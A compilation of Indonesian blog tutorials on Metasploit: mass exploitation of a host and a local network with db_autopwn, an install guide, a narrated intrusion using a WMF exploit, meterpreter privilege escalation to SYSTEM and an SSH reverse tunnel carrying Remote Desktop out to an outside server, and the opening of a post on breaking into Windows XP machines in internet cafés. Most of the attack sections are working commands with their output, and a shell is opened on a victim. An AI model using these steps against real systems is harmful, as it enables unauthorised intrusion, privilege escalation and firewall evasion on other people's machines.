Metasploit In Actions Part 2

Artikel ini merupakan lanjutan dari artikel sebelumnya yaitu Metasploit I : Teknik Dasar. Dalam artikel yang kedua ini saya ingin membahas mengenai penggunaan metasploit untuk mass exploitation dengan menggunakan db_autopwn.
Sebelumnya pastikan instalasi metasploit kita sudah terintegrasi terlebih dahulu dengan database (bisa menggunakan MySQL, postgre, ataupun SQLite3) dan nmap. Prosedur instalasinya silahkan anda lihat disini.
Metode mass exploitation pertama yang akan saya gunakan dalam artikel ini menggunakan teknik mass exploit pada satu mesin dengan memanfaatkan vulnerability di seluruh layanan server/port yang terbuka, atau kita istilahkan pendekatan secara vertikal (istilah ini ndak akan ketemu kalo mbuka-mbuka kamus eksploitasi sistem, lha wong istilahnya made in indo hahaha.. ). Model pendekatan yang lain juga akan dicoba (secara singkat) di bawah artikel ini.

Metode mass exploit secara vertikal
Ya dah langsung kita coba aja ke satu mesin yang sudah kita siapkan sebelumnya.

- Jalankan metasploit console dari shell :

$ sudo msfconsole

_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[ msf v3.3-dev
+ -- --=[ 359 exploits - 233 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 132 aux

- Jalankan plugin mysql terlebih dahulu (saya menggunakan mysql database)

msf > load db_mysql

[*] Successfully loaded plugin: db_mysql

- Sambungkan metasploit dengan database di MySQL

msf > db_connect msf:msf@localhost/metasploit
msf >

- Scan mesin target menggunakan nmap untuk melihat port yang terbuka.
Hasil scan ini akan tersimpan otomatis kedalam database yang telah disiapkan sebelumnya.

msf > db_nmap -v -sS 192.168.1.10

[*] exec: "/usr/bin/nmap" "-v" "-sS" "192.168.1.10" "-oX" "/tmp/dbnmap20090404-13424-19l1thf-0"
NMAP:
NMAP: Starting Nmap 4.62 ( http://nmap.org ) at 2009-04-04 17:35 CIT
NMAP: Initiating ARP Ping Scan at 17:35
NMAP: Scanning 192.168.1.10 [1 port]
NMAP: Completed ARP Ping Scan at 17:35, 0.00s elapsed (1 total hosts)
NMAP: Initiating Parallel DNS resolution of 1 host. at 17:35
NMAP: Completed Parallel DNS resolution of 1 host. at 17:35, 0.00s elapsed
NMAP: Initiating SYN Stealth Scan at 17:35
NMAP: Scanning 192.168.1.10 [1715 ports]
NMAP: Discovered open port 1723/tcp on 192.168.1.10
NMAP: Discovered open port 3389/tcp on 192.168.1.10
NMAP: Discovered open port 139/tcp on 192.168.1.10
NMAP: Discovered open port 1025/tcp on 192.168.1.10
NMAP: Discovered open port 1026/tcp on 192.168.1.10
NMAP: Discovered open port 445/tcp on 192.168.1.10
NMAP: Discovered open port 1043/tcp on 192.168.1.10
NMAP: Discovered open port 12345/tcp on 192.168.1.10
NMAP: Discovered open port 1521/tcp on 192.168.1.10
NMAP: Discovered open port 135/tcp on 192.168.1.10
NMAP: Discovered open port 3372/tcp on 192.168.1.10
NMAP: Discovered open port 1433/tcp on 192.168.1.10
NMAP: Completed SYN Stealth Scan at 17:35, 0.67s elapsed (1715 total ports)
NMAP: Host 192.168.1.10 appears to be up ... good.
NMAP: Interesting ports on 192.168.1.10:
NMAP: Not shown: 1703 closed ports
NMAP: PORT STATE SERVICE
NMAP: 135/tcp open msrpc
NMAP: 139/tcp open netbios-ssn
NMAP: 445/tcp open microsoft-ds
NMAP: 1025/tcp open NFS-or-IIS
NMAP: 1026/tcp open LSA-or-nterm
NMAP: 1043/tcp open boinc
NMAP: 1433/tcp open ms-sql-s
NMAP: 1521/tcp open oracle
NMAP: 1723/tcp open pptp
NMAP: 3372/tcp open msdtc
NMAP: 3389/tcp open ms-term-serv
NMAP: 12345/tcp open netbus
NMAP: MAC Address: 00:1C:C0:50:B9:00 (Intel Corporate)
NMAP:
NMAP: Read data files from: /usr/share/nmap
NMAP: Nmap done: 1 IP address (1 host up) scanned in 0.872 seconds
NMAP: Raw packets sent: 1716 (75.502KB) | Rcvd: 1716 (78.932KB)
msf >

- Untuk mengetahui opsi-opsi db_autopwn, bisa dilihat terlebih dahulu dari menu help-nya. Silahkan anda coba dan pelajari opsi-opsi tersebut dengan berbagai kombinasi yang anda inginkan

msf > db_autopwn -h

[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port
-q Disbale exploit module output
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
msf >

- db_autopwn akan kita jalankan menggunakan modul-modul exploit yang sesuai dengan port-port yang sebelumnya telah tersimpan di database

msf > db_autopwn -p -t

[*] Analysis completed in 6.07385802268982 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_exec against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.1.10:445...
[*] Matched auxiliary/admin/db2/db2rcmd against 192.168.1.10:445...
[*] Matched auxiliary/scanner/mssql/mssql_login against 192.168.1.10:1433...
[*] Matched auxiliary/dos/windows/smb/ms06_063_trans against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rasmans_reg against 192.168.1.10:445...
[*] Matched auxiliary/scanner/smb/login against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rras against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_addprivs_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/psexec against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_066_nwapi against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms04_011_lsass against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms03_049_netapi against 192.168.1.10:445...
[*] Matched exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.10:135...
[*] Matched exploit/solaris/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/multi/samba/nttrans against 192.168.1.10:139...
[*] Matched auxiliary/dos/windows/smb/vista_negotiate_stop against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms09_001_write against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms08_067_netapi against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms04_031_netdde against 192.168.1.10:445...
[*] Matched exploit/windows/smb/msdns_zonename against 192.168.1.10:445...
[*] Matched exploit/linux/pptp/poptop_negative_read against 192.168.1.10:1723...
[*] Matched exploit/windows/brightstor/etrust_itm_alert against 192.168.1.10:445...
[*] Matched exploit/solaris/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/netware/smb/lsass_cifs against 192.168.1.10:445...
[*] Matched auxiliary/scanner/dcerpc/management against 192.168.1.10:135...
[*] Matched auxiliary/scanner/dcerpc/endpoint_mapper against 192.168.1.10:135...
[*] Matched exploit/windows/smb/ms06_066_nwwks against 192.168.1.10:445...
[*] Matched exploit/windows/mssql/ms02_056_hello against 192.168.1.10:1433...
[*] Matched exploit/linux/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_sql against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms04_007_killbill against 192.168.1.10:445...
msf >

- Lakukan exploitasi system dengan menambahkan opsi -e :

msf > db_autopwn -p -t -e

[*] Analysis completed in 6.27089881896973 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_exec against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.1.10:445...
[*] (3/39): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched auxiliary/admin/db2/db2rcmd against 192.168.1.10:445...
[*] Matched auxiliary/scanner/mssql/mssql_login against 192.168.1.10:1433...
[*] Matched auxiliary/dos/windows/smb/ms06_063_trans against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rasmans_reg against 192.168.1.10:445...
[*] Matched auxiliary/scanner/smb/login against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rras against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_addprivs_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/psexec against 192.168.1.10:445...
[*] (13/39): Launching exploit/windows/smb/psexec against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_066_nwapi against 192.168.1.10:445...
[*] (14/39): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.10:445...
[*] Started bind handler
[-] Exploit failed: No encoders encoded the buffer successfully.
[*] Connecting to the server...
[*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.1.10:445...
[*] Authenticating as user 'Administrator'...
[*] (15/39): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/smb/ms04_011_lsass against 192.168.1.10:445...
[*] (16/39): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
[*] Matched exploit/windows/smb/ms03_049_netapi against 192.168.1.10:445...
[*] (17/39): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.10:135...
[*] (18/39): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.10:135...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/solaris/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] (19/39): Launching exploit/solaris/samba/lsa_transnames_heap against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/multi/samba/nttrans against 192.168.1.10:139...
[*] (20/39): Launching exploit/multi/samba/nttrans against 192.168.1.10:139...
[*] Matched auxiliary/dos/windows/smb/vista_negotiate_stop against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms09_001_write against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms08_067_netapi against 192.168.1.10:445...
[*] (23/39): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/smb/ms04_031_netdde against 192.168.1.10:445...
[*] (24/39): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/smb/msdns_zonename against 192.168.1.10:445...
[*] (25/39): Launching exploit/windows/smb/msdns_zonename against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/linux/pptp/poptop_negative_read against 192.168.1.10:1723...
[*] (26/39): Launching exploit/linux/pptp/poptop_negative_read against 192.168.1.10:1723...
[-] Exploit failed: wrong number of arguments (1 for 0)
[*] Matched exploit/windows/brightstor/etrust_itm_alert against 192.168.1.10:445...
[*] (27/39): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/solaris/samba/trans2open against 192.168.1.10:139...
[*] (28/39): Launching exploit/solaris/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] (30/39): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.1.10[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.1.10[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Server appears to have been patched
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.1.6:46451 -> 192.168.1.10:29595)
[*] Matched exploit/netware/smb/lsass_cifs against 192.168.1.10:445...
[*] (31/39): Launching exploit/netware/smb/lsass_cifs against 192.168.1.10:445...
[*] Matched auxiliary/scanner/dcerpc/management against 192.168.1.10:135...
[*] Matched auxiliary/scanner/dcerpc/endpoint_mapper against 192.168.1.10:135...
[*] Matched exploit/windows/smb/ms06_066_nwwks against 192.168.1.10:445...
[*] (34/39): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/mssql/ms02_056_hello against 192.168.1.10:1433...
[*] (35/39): Launching exploit/windows/mssql/ms02_056_hello against 192.168.1.10:1433...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/linux/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_sql against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms04_007_killbill against 192.168.1.10:445...
msf >

- Eksploitasi telah selesai. Periksa session yang aktif dengan menuliskan perintah session -l. Apabila ada message no active session berarti eksploitasi yang kita lakukan gagal.

msf > sessions -l

Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.1.6:46451 -> 192.168.1.10:29595

- Dari message diatas diketahui eksploitasi telah berhasil dilakukan dan ada 1 sesi yang aktif, yaitu session dengan id 1. Untuk berinteraksi dengan session yang aktif :

msf > sessions -i 1

[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

C:\WINDOWS\system32>ipconfig

ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.1.10
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.254
C:\WINDOWS\system32>

Owned… !!

Metode mass exploit secara horisontal / linier
Sebenarnya cara yang dipakai dalam metode ini sama dengan metode sebelumnya, yang membedakan adalah model pencarian port yang terbuka. Cara ini lebih fokus kepada pencarian kelemahan sistem pada port tertentu dalam suatu network. Jadi yang pegang peranan dalam pemilihan metode ini sebenarnya adalah pada kustomisasi command di nmap. Contoh paling mudah yaitu memanfaatkan exploit MS Windows MS08-067 seperti artikel terdahulu. Test case kali ini memanfaatkan exploit tersebut di dalam network lokal saya : 192.168.1.0/24.
Silahkan anda ikuti saja tutorial seperti metode yang diatas hanya saja command pencarian port yang terbuka diubah menjadi :

msf > nmap -sS -p 445 -n -T Aggressive 192.168.1.0/24

[*] exec: nmap -sS -p 445 -n -T Aggressive 192.168.1.0/24
Starting Nmap 4.62 ( http://nmap.org ) at 2009-04-05 17:06 CIT
Interesting ports on 192.168.1.6:
PORT STATE SERVICE
445/tcp closed microsoft-ds
Interesting ports on 192.168.1.10:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:1C:C0:50:B9:00 (Intel Corporate)
Interesting ports on 192.168.1.12:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:11:2F:A6:03:9F (Asustek Computer)
Interesting ports on 192.168.1.20:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:1E:8C:CC:07:2A (Asustek Computer)
Interesting ports on 192.168.1.26:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:04:23:6E:EC:AD (Intel)
Interesting ports on 192.168.1.28:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:1E:8C:67:59:F9 (Asustek Computer)
Interesting ports on 192.168.1.30:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:1E:EC:79:94:F7 (Compal Information (kunshan) CO.)
Interesting ports on 192.168.1.103:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:18:DE:07:3D:91 (Intel)
Interesting ports on 192.168.1.254:
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:1D:7E:27:BA:E6 (Cisco-Linksys)
Nmap done: 256 IP addresses (9 hosts up) scanned in 2.566 seconds
msf >

Apabila anda masih mengalami kesulitan dalam menerapkan metode ini, silahkan anda baca artikel yang juga sudah lengkap dengan step by step-nya dari blog temen-temen kecoak disini atau blognya pakde HDM disini.

Nah… sekarang coba anda bayangkan, gimana kalo kedua metode tersebut digabung? Dalam artian melakukan scaning ke SEMUA port terbuka dalam suatu network? Atau malah scanning ke network berkelas A.. Silahkan anda bayangkan sendiri.. :D
Kalo bayangan saya ya kompi anda pasti hang apalagi kalo resource hardwarenya pas-pasan kaya saya ini hehehe.. Atau malah lebih sadis lagi kalo anda gunakan untuk scanning di internet bisa-bisa diblokir ma ISP-nya haha….
Sebenarnya teknik-teknik ini kurang bagus, karena eksploitasi yang dilakukan tergolong ngawor, karena dengan hanya ber-ASUMSI pada port terbuka, maka db_autopwn akan menjalankan SEMUA modul yang ada dengan spesifikasi port tersebut, ndak peduli modul yang dipanggil relevan apa tidak dengan vulner/sistem yang terkait.
Supaya eksploitasi sistem lebih fokus dan terarah dapat juga menggunakan tools nessus, karena kita dapat memanfaatkan cross referencing mode (opsi -x) di db_autopwn. Artikelnya nyusul yah, karena laptop ini belum ada nessusnya. Abis fresh install :D

Seperti biasa, use this article wisely. Saya ndak akan nulis artikel ini utk tujuan pendidikan semata, penulis tidak bertanggung jawab bla..bla..bla.. Tapi saya lebih suka menggugah kesadaran anda saja.

WARNING!!!!!! INI HANYA UNTUK PEMBELAJARAN SEMATA, MOHON JANGAN DISALAH GUNAKAN!!!

Metasploit Auto Exploit

Sejak Metasploit Framework versi 3 dirilis pada awal tahun 2007, H.D Moore (pembuat Metasploit) melakukan perubahan besar-besaran di tubuh Metasploit versi 3 tersebut. Dengan mengintegrasikannya ke pemrograman Ruby, dengan jelas terlihat bahwa H.D Moore hendak menjadikan Metasploit sebagai framework tool yang tidak bisa dipandang sebelah mata lagi, dan patut disejajarkan dengan tool-tool pentest lainnya yang telah lebih dulu dianggap professional. Apalagi dengan modul tambahan yang powerful, db_autopwn, sebuah modul yang memungkinkan sebuah auto exploiting system.
Modul db_autopwn diperkenalkan pertama kali pada sistem operasi Linux Backtrack 2, dengan alasan bahwa program tersebut cocoknya berada pada sistem operasi yang berbau auditing/pentest.
Pada kesempatan kali ini, saya ingin menunjukkan cara menjalankan modul db_autopwn pada distro Linux selain Backtrack 2, yaitu Linux Mint 4.0 (Daryna). Yang saya lakukan adalah sebagai berikut:
1.Menyiapkan direktori untuk keperluan download.
tom@m1abrams:~$ sudo mkdir /pentest/
tom@m1abrams:~$ sudo chown tom:admin /pentest/
tom@m1abrams:~$ cd /pentest

2. Install Subversion
tom@m1abrams:/pentest$ sudo apt-get install subversion
3. Install Metasploit dari SVN
tom@m1abrams:/pentest$ svn co http://metasploit.com/svn/framework3/trunk/
4. Install Ruby dan semua paket yang berhubungan.
tom@m1abrams:/pentest$ sudo apt-get install ruby libruby rdoc libyaml-ruby libzlib-ruby libopenssl-ruby libdl-ruby libreadline-ruby libiconv-ruby rubygems
5.Install Ruby on Rails (jawab ‘Y’ untuk semuanya)
tom@m1abrams:/pentest$ gem install -v=1.2.3 rails
6. Install libgtk2-ruby, libglade2-ruby, sqlite3, dst..
tom@m1abrams:/pentest$ sudo apt-get install libgtk2-ruby libglade2-ruby sqlite3 libsqlite3-ruby1.8 libdbd-sqlite3-ruby1.8
7. Install Nmap
tom@m1abrams:/pentest$ sudo apt-get install nmap
Ok ! Sampai disini, persiapan selesai. Apabila kita melihat isi dari direktori tempat metasploit yang kita download dari SVN, direktorinya bernama trunk, lebih mudah apabila kita menggantinya jadi msf3.
tom@m1abrams:/pentest$ ls
trunk
tom@m1abrams:/pentest$ mv trunk msf3
tom@m1abrams:/pentest$ ls
msf3
tom@m1abrams:/pentest$

8. Silakan masuk ke direktori msf3.
tom@m1abrams:/pentest$ cd msf3
tom@m1abrams:/pentest/msf3$ ls
data lib msfconsole msfgui msfpescan README
documentation modules msfd msfopcode msfweb scripts
external msfcli msfencode msfpayload plugins tools
tom@m1abrams:/pentest/msf3$

9. Jalankan msfconsole..
tom@m1abrams:/pentest/msf3$ ./msfconsole
=[ msf v3.1-dev
+ -- --=[ 259 exploits - 116 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 44 aux
msf >
10. Load modul SQLite3 yang telah kita install dan membuat database pentest
msf > load db_sqlite3
msf > db_create pentest

11. Untuk melihat perintah-perintah yang tersedia, ada pada menu help
Database Backend Commands
=========================

Command Description
------- -----------
db_add_host Add one or more hosts to the database
db_add_port Add a port to host
db_autopwn Automatically exploit everything
db_hosts List all hosts in the database
db_import_nessus_nbe Import a Nessus scan result file (NBE)
db_import_nmap_xml Import a Nmap scan results file (-oX)
db_nmap Executes nmap and records the output automatically
db_services List all services in the database
db_vulns List all vulnerabilities in the database
SQLite3 Database Commands
=========================
Command Description
------- -----------
db_connect Connect to an existing database ( /path/to/db )
db_create Create a brand new database ( /path/to/db )
db_destroy Drop an existing database ( /path/to/db )
db_disconnect Disconnect from the current database instance
12. Jalankan db_autopwn untuk melihat menu helpnya.
msf> db_autopwn
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-s Only obtain a single shell per target system (NON-FUNCTIONAL)
-r Use a reverse connect shell
-b Use a bind shell on a random port
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range

13. Testing pada jaringan lokal..
Saya menjalankan perintah db_nmap [network]
msf > db_nmap 192.168.10.*
Starting Nmap 4.20 ( http://insecure.org ) at 2007-12-23 17:57 WIT
Interesting ports on 192.168.10.1:
Not shown: 1693 closed ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Interesting ports on 192.168.10.5:
Not shown: 1696 closed ports
PORT STATE SERVICE
22/tcp open ssh
Interesting ports on 192.168.10.9:
Not shown: 1691 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
3389/tcp open ms-term-serv
5000/tcp open UPnP
Nmap finished: 256 IP addresses (3 hosts up) scanned in 3.147 seconds
msf >
Terlihat bahwa pada jaringan lokal tersebut, terdapat 3 host yang ditemukan oleh db_nmap. Hasil scanning tersebut dimasukkan dalam tabel-tabel yang telah dibuat oleh db_sqlite3.
14. Melihat service yang ditemukan oleh db_nmap.
msf > db_services
[*] Service: host=192.168.10.1 port=139 proto=tcp state=up name=netbios-ssn
[*] Service: host=192.168.10.1 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.10.5 port=22 proto=tcp state=up name=ssh
[*] Service: host=192.168.10.9 port=135 proto=tcp state=up name=msrpc
[*] Service: host=192.168.10.9 port=139 proto=tcp state=up name=netbios-ssn
[*] Service: host=192.168.10.9 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.10.9 port=1025 proto=tcp state=up name=NFS-or-IIS
[*] Service: host=192.168.10.9 port=3389 proto=tcp state=up name=ms-term-serv
[*] Service: host=192.168.10.9 port=5000 proto=tcp state=up name=UPnP
msf >

Program db_autopwn dibuat secara mengagumkan dengan memanfaatkan database, sehingga melancarkan serangan otomatis bukanlah mustahil.
Referensi:
Metasploit 3.0 – Automated Exploitation

Tehnik Tunneling dalam Hacking

Tunneling biasanya dipakai sebagai tehnik untuk meloloskan paket dari jaringan yang terisolasi oleh firewall atau oleh jaringan itu sendiri (NAT). Para administrator jaringan biasanya membuat sebuah tunnel untuk dapat mengakses bagian yang tidak dapat diakses tersebut. Bayangkan jika Anda seorang administrator jaringan hendak melakukan remote connection ke jaringan Anda sendiri namun komputer yang hendak Anda remote berada di balik NAT / jaringan yang tidak di routing ke internet, bagaimana melakukannya? Tentu saja dengan tehnik tunneling.
Tehnik tunneling juga dipakai oleh pentester untuk mendukung pekerjaan penetration test. Mari kita lihat tehnik ini berjalan.
Sebagai seorang pentester, saya ditugaskan untuk menjebol sistem sampe tuntas, termasuk jaringan internal target. Singkat cerita, saya telah mendapatkan remote shell dari sebuah komputer yang hanya dapat diakses dari satu subnet jaringan. Setelah ditelusuri, komputer target membuka port 3389 yang artinya service Remote Desktop sedang berjalan dan siap diakses. Namun karena komputer target berada pada jaringan NAT, maka koneksi langsung ke port 3389 akan segera diblok oleh Gateway/Firewall. Saya mencoba koneksi reverse connect dengan netcat, namun yang menjadi penghalang, ternyata OUTBOUND rule pada firewall hanya memperbolehkan koneksi ke port 80 dan 443, selain itu di blok. Untuk itulah saya terpikir untuk menggunakan SSH Tunneling, sebuah server SSH saya siapkan untuk listening di port 80. OIya, saya menggunakan Backtrack untuk melakukan ini semua :)
Eksploitasi sukses dilakukan dengan Metasploit dengan sedikit metode Social engineering terhadap salah satu staff di perusahaan tersebut. Metasploit memberikan saya sebuah remote back shell meterpreter yang multifungsi.
msf exploit(ms06_001_wmf_setabortproc) > exploit
[*] Exploit running as background job.
msf exploit(ms06_001_wmf_setabortproc) >
[*] Started reverse handler on 203.128.250.15:4444
[*] Using URL: http://203.128.250.15:80/register.html
[*] Server started.
[*] Sending exploit to 203.128.250.15:51368...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (203.128.250.15:4444 -> 203.128.250.15:54652)
msf exploit(ms06_001_wmf_setabortproc) > sessions -l
Active sessions
===============
  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  203.128.250.15:4444 -> 203.128.250.15:54652
msf exploit(ms06_001_wmf_setabortproc) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: ITUSR-54\admin
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Setelah mendapatkan akses setara dengan SYSTEM, saya mengupload ssh client yang terdapat dalam paket Putty, yaitu plink.exe.
meterpreter > upload /pentest/windows-binaries/tools/plink.exe C:\\windows\
[*] uploading  : /pentest/windows-binaries/tools/plink.exe -> C:\\windows\
[*] uploaded   : /pentest/windows-binaries/tools/plink.exe -> C:\windows\
meterpreter >
Setelah itu saya mengakses shell pada target, dan mengeksekusi SSH client untuk segera membuat tunneling ke server SSH yang telah saya siapkan sebelumnya.
meterpreter > execute -f cmd -c -H
Process 1776 created.
Channel 2 created.
meterpreter > interact 2
Interacting with channel 2...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\admin\Desktop>plink -P 80 -l root -pw toor -C -R 3389:127.0.0.1:3389 203.128.250.15
plink -P 80 -l root -pw toor -C -R 3389:127.0.0.1:3389 203.128.250.15
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's key fingerprint is:
ssh-rsa 2048 ce:bf:86:ed:50:68:bf:21:8f:c2:a9:63:9f:07:d5:0c
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y
BackTrack 4 (PwnSauce) Penetration Testing and Auditing Distribution
Last login: Wed Feb 24 23:04:29 2010 from 10.5.5.243
root@bt:~#
Terlihat bahwa koneksi SSH telah terbentuk (pada port 80) antara target dengan komputer saya, ditandai dengan keluarnya shell Backtrack saya pada komputer target. Pada komputer saya, juga segera terbentuk port 3389 yang listening di 127.0.0.1 (localhost). Sampai saat ini, port 3389 service Remote Desktop komputer target telah berhasil di tunneling ke komputer saya dengan port yang sama, namun melewati koneksi SSH.
tom@bt:/$ rdesktop 127.0.0.1
Autoselected keyboard map en-us
WARNING: Remote desktop does not support colour depth 24; falling back to 16
Tehnik tunneling sangat berguna untuk berbagai keadaan, salah satunya adalah situasi diatas.
Tehnik lainnya akan segera menyusul :)

Metasploit Complete Tutorial With Supporting tools

Network Security (Hacking)…
kali ini saya akan memapaparkan tentang bagaimana cara kita menyusup ke komputer yang terinstall windows XP service pack 1 sampai dengan 3..
pastikan juga kalian mempunya DEEPFREEZE REMOVER untuk itu bisa kalian lihat di postingan saya sebelumnya.kenapa saya menganjurkan kalian mempunya deepfreeze remover, karena bisa saja warnet tempat kalian bermain di lock installation new softwarenya.
tetapi pasti teman teman menanyakan 2 pertanyaan kepada saya tentang:
1.> Keuntungan Apa yang di dapatkan dari menyusup ke komputer orang lain :
*.> Pengetahuan yang baru yang bisa jadi berguna untuk anda
